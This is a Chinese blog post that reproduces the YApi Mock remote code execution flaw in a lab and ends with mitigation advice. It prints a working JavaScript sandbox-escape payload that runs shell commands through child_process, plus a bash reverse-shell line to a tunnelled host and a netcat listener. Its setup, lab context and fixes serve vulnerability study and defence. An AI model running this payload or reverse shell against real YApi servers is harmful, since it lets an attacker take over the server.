YApi Mock功能远程代码执行漏洞复现

最新推荐文章于 2023-04-23 15:19:14 发布
最新推荐文章于 2023-04-23 15:19:14 发布
阅读量920 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/119462849
版权

YApi Mock功能远程代码执行漏洞复现

文章目录

漏洞描述

API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。

影响版本

YApi7月7日前版本,即版本<=1.92(后文有说明)

环境搭建

一、kali使用git直接克隆到本地(失败)

地址:https://github.com/Ryan-Miao/docker-yapi

git clone https://github.com/Ryan-Miao/docker-yapi.git

image-20210805174147977

然后启动环境

docker-compose up -d

加个-d在后台运行比较方便,如果想看到镜像的运行过程,可以不加-d,如下图

image-20210805181057212

二、nmp直接下载(失败)

地址 :https://github.com/YMFE/yapi/

下载后npm安装

npm install -g yapi-cli --registry https://registry.npm.taobao.org

目录下启动环境

yapi server

服务管理

image-20210806113251607

启动环境后访问9090端口开始部署环境

image-20210806113449404

直接默认部署即可,也可以选择版本

image-20210806113656951

等待部署完成。

翻车:

image-20210806163846072

应该是没有MongoDB服务导致的

Mongdb安装配置

具体可以看这篇文章:https://www.cnblogs.com/jackson-yqj/p/11043770.html

1、下载Mongdb
curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-4.0.10.tgz    # 下载
2、解压并拷贝到指定目录
tar -zxvf mongodb-linux-x86_64-4.0.10.tgz                                   # 解压
mv  mongodb-linux-x86_64-4.0.10/ /usr/local/mongodb                         # 将解压包拷贝到指定目录
3、配置系统环境变量

vim /etc/profile

会提示文件已存在,输入“e”,回车,然后键盘按下“i” ,进入编辑模式即可。在文件的最后加上:

#mongodb
export PATH=$PATH:/usr/local/mongodb/bin

image-20210806164250039

4、建MongoDB数据存放文件夹和日志记录文件夹
mkdir data/db
mkdir data/logs
5、创建MongoDB运行时使用的配置文件

1,进入bin目录下:cd /usr/local/mongodb/bin

2,创建mongodb.conf配置文件:vim mongodb.conf

会提示是new file,直接输入下面内容:

image-20210806173716900

保存好。

6、启动MongoDB服务

1,进入bin目录下:cd /usr/local/mongodb/bin

2,加载配置文件方式启动:./mongod -f mongodb.conf

报错

image-20210806170104606

看这篇文章:https://blog.csdn.net/qq_42910468/article/details/103076136

再次失败!放弃

三、另一个地址的git(失败)

git clone https://github.com/fjc0k/docker-YApi.git

docker-compose up -d

image-20210806144104290搭建成功,但是复现之后发现已经修复了

四、利用vulfous靶场

漏洞复现

1、注册用户

image-20210806145309567

这里虽然关闭了注册,我们在docker-compose.yml中将true修改为flase,关闭这个功能,这也是这个漏洞的防护方法之一

image-20210806145818553

然后重启镜像,随意注册一个用户

image-20210806150557699

2、添加项目

image-20210806150704266

3、添加接口

image-20210806150829618

4、设置mock

image-20210806151342304

写入Poc:i whoami &&ls /tmp即为要执行的命令,记得保存

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami &&  ls /tmp").toString()

5、访问Mock地址

回到预览位置,访问地址

image-20210806151156746

翻车

image-20210806151857631

说明该git下载的版本已经修复这个漏洞了。。 查看一下文档,果然。因此,漏洞版本为1.92之前的版本。。。

image-20210806153533728

这里因为版本问题复现复现失败,但是过程是一致的,后面利用vulfocus复现一下,只展示结果

6、命令执行成功

image-20210806183953773

7、反弹shell

同样,也可以利用命令实现反弹shell。

这里利用NATAPP实现隧道穿透到虚拟机https://natapp.cn/

image-20210806184423418

端口映射到公网上进行反弹shell

开启 ./natapp -authtoken=填自己的token值

在这里插入图片描述

监听4444端口 nc -lvp 4444

然后反弹shell命令

bash -i >& /dev/tcp/server.natappfree.cc/45741 0>&1

先鸽了没成功

漏洞修复

1、关闭YApi用户注册功能;修改完成后,重启YApi服务

"config.json"添加"closeRegister:true"配置项:
{
  "port": "*****",
  "closeRegister":true
}

2、暂时关闭mock功能(需要修改YApi代码)

在"config.json"中添加"mock: false";

"exts/yapi-plugin-andvanced-mock/server.js"中找到

if (caseData&&caseData.case_enable{...}

在其上方添加

if(!yapi.WEBCONFIG.mock) {return false;}

3、白名单限制;

安全组配置白名单访问,或者使用NGINX进行代理,限制白名单IP访问;

4、检查用户列表,删除恶意不明用户;并删除恶意不明用户创建的接口及mock脚本。

yyyyzzzllll
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
测试网站搭建+渗透+审计之第三篇Swagger接口渗透测试
千寻的博客
06-08 1791
Swagger 是一款RESTful接口的文档在线自动生成加功能测试的软件。
yapi:Docker for YApi 一键部署YApi
05-05
Docker for YApi 一键部署YApi JimCY [[email protected]] :warning:注意 :warning:注意:本仓库目前只支持安装,暂不支持升级,请知晓。如需升级请备份mongoDB内的数据。 使用 默认密码是:ymfe.org,安装成功后进入...
yapi离线安装包及环境
06-26
yapi离线安装信息
yapi 代码执行
YouthBelief的博客
11-04 504
yapi 代码执行 yapi 代码执行0x01 漏洞描述0x02 影响范围0x03 漏洞复现尝试反弹shell0x04 漏洞修复 yapi 代码执行 fofa指纹app=“YAPI”   打开登录页面,注册账号,新增项目,新增接口   打开高级Mock   开启脚本   写入poc 0x01 漏洞描述 API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易
[漏洞复现]Yapi Mock 远程代码执行漏洞复现
3tefanie丶zhou的博客
07-12 346
一丶漏洞介绍 YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。 二丶复现步骤 1.找到注册功能点,注册一个用户 2.利用注册的用户账号密码登陆,添加一个项目 3.然后添加接口 4.在添加的接口里面找到高级Moc,添加脚本POC,保存 5.在预览处点击Mock地址链接,复现成功 三丶修复方案 关闭注册功能,禁止使用默认账号密码 清除可疑账户 删除Mock恶意脚本 ...
YAPI Mock远程代码执行漏洞
anan的博客
07-09 956
目录前言漏洞原理影响版本环境搭建漏洞利用手工复现脚本复现脚本获取:漏洞修复参考链接 前言 YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业使用。 漏洞原理 YAPI项目使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务。其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用
实战 - YApi 接口管理平台 后台任意命令执行漏洞
HAKUNAMATATATTA的博客
04-23 587
YApi 接口管理平台 后台存在命令执行漏洞,攻击者通过发送特定的请求可执行任意命令获取服务器权限。
Yapi命令执行漏洞复现
MrHatSec的博客
07-28 3888
YApi是高效、易用、功能强大的api管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护API,YApi还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。...
Yapi Mock 远程代码执行漏洞
weixin_45694388的博客
07-09 560
跟风一波复现Yapi 漏洞描述: YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态,强烈建议客户尽快采取缓解措施以避免受此漏洞影响 fofa: Fofa:app="YApi" 漏洞复现: 默认注册功能开启。 注册后创建项目: 添加接口: 创建接口成功: 选择“高级Mock”,“脚本”,开启脚本: 写入poc并保存: const sandbox = this const ObjectConstruc
apache的..%5c漏洞原因源代码分析
FreeXploiT
10-24 1122
下面是源代码 src/main/http_request.c: 的处理请求的代码: static void process_request_internal(request_rec *r) { int access_status; /* Ignore embedded %2Fs in path for proxy requests */ if (r->proxyreq == NOT_PROXY
远程命令执行漏洞-mock修改
qq_44038971的博客
12-12 263
远程命令执行漏洞-mock修改
yapi二次开发的详细手册
04-08
yapi二次开发的详细手册主要包含四部分, 1本地yapi的部署,2服务器CentOS系统安装部署Yapi,3接口分类层级的修改,4新模块的增加 用了我一个月的时间梳理,也是不容易,大家如果做yapi的二次开发,可以看看。
yapi多级目录版本.zip
10-24
yapi支持多级目录包,下载之前先安装mongodb,然后修改config配置,再进入vendors 输入 npm run install-serve 初始化数据,最后运行node server/app.js 启动即可 详情参考: https://github.com/zybieku/yapi
yapi-docker:使用docker构建yapi容器
04-29
第一次初始化默认拉取的最新的版本,所以不用指定版本,若是yapi代码不严谨,连新版本初始化都会报错则无解! yapi的部署 yapi的升级 创建volume docker volume create yapi-mongo 创建一个储存卷,用来专门存放yapi使用...
用友NC的一些漏洞复现
热门推荐
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
Apache Spark 未授权访问漏洞复现
yzl_007的博客
08-26 4461
Apache Spark 未授权访问漏洞复现 Apache Spark 未授权访问漏洞复现介绍环境搭建漏洞复现使用msf进行攻击另一个方法 介绍 Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。 环境搭建 kali :192.168.89.130 使用vulhub漏洞靶场搭建,进入目录下/spark/unacc ,运行 docker-compose up -d [外链图片转存失败,源站可能有防
搭建vulfocus漏洞靶场
yzl_007的博客
09-22 4418
搭建vulfocus漏洞靶场 首先准备好了一台centos7系统的虚拟机 可以在这里下载http://mirrors.neusoft.edu.cn/centos/7/isos/x86_64/ 看自己需求下载 然后安装docker curl -fsSL https://get.docker.com | bash -s docker --mirror aliyun 启动docker systemctl start docker 拉取镜像 docker pull vulfocus/vulfocus:lat
Log4j2远程命令执行复现
yzl_007的博客
12-12 3881
Log4j2远程命令执行复现 Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell 一、漏洞环境 环境是http://vulfocus.fofa.so平台的 二、漏洞验证 启动环境后访问 抓包,修改请求为post 在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回显到dnslog平台 三、反弹shell 使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload 可以在这里
Tomcat8 + 弱口令 && 后台getshell 漏洞复现
yzl_007的博客
08-08 2466
Tomcat8 + 弱口令 && 后台getshell 漏洞复现 环境开启 启动docker开启镜像环境 vulhub镜像中的tomcat8文件目录下,docker-compose up -d 成功在主机上访问到 漏洞复现 根据弱密码tomcat/tomcat登陆管理后台 或者使用tomcat爆破工具 在下面位置可以找到上传点 <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!cl
yapi 接口文档_Yapi部署笔记
最新发布
05-20
感谢您的提问,以下是Yapi接口文档和部署笔记: ## Yapi接口文档 Yapi是一个开源的、高效的、易用的接口管理平台,可以帮助团队更好地协作开发、测试和部署。它提供了丰富的接口管理、文档生成和Mock数据等功能,可以大大提升团队的开发效率和项目质量。 Yapi支持多种类型的接口,包括RESTful API、GraphQL API、RPC API等,可以满足不同的业务需求。同时,Yapi还支持多人协作、权限管理、版本控制等功能,可以让团队更加高效地进行接口开发和测试。 在使用Yapi时,您可以通过创建项目、添加接口、编写文档、生成Mock数据等方式来管理接口。Yapi还提供了丰富的插件和扩展,可以让您更加灵活地使用和定制Yapi。 ## Yapi部署笔记 Yapi的部署比较简单,您只需要按照以下步骤即可完成: 1. 安装Node.js和MongoDB Yapi是基于Node.js和MongoDB开发的,因此您需要先安装它们。您可以到官网下载Node.js和MongoDB的安装包,并按照官方文档进行安装。 2. 下载Yapi源码 您可以从Yapi的官方Github仓库中下载源码: ``` git clone https://github.com/YMFE/yapi.git vendors/yapi ``` 3. 安装依赖 进入Yapi的源码目录,执行以下命令安装依赖: ``` cd vendors/yapi npm install --production ``` 4. 配置Yapi 在Yapi的源码目录中,有一个`config.json`文件,它包含了Yapi的各种配置信息,您可以根据自己的需求进行修改。其中,重要的配置项包括: ``` { "port": "3000", // Yapi服务的端口号 "adminAccount": { // 管理员账号信息 "username": "admin", "password": "ymfe.org" }, "db": { // MongoDB的配置信息 "servername": "127.0.0.1", "port": 27017, "DATABASE": "yapi" } } ``` 5. 启动Yapi 在Yapi的源码目录中,执行以下命令启动Yapi: ``` node server/app.js ``` 然后,您就可以在浏览器中访问`http://localhost:3000`来使用Yapi了。 以上就是Yapi的简单部署笔记,希望对您有所帮助。如果您想了解更多关于Yapi的内容,可以参考官方文档:https://hellosean1025.github.io/yapi/。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值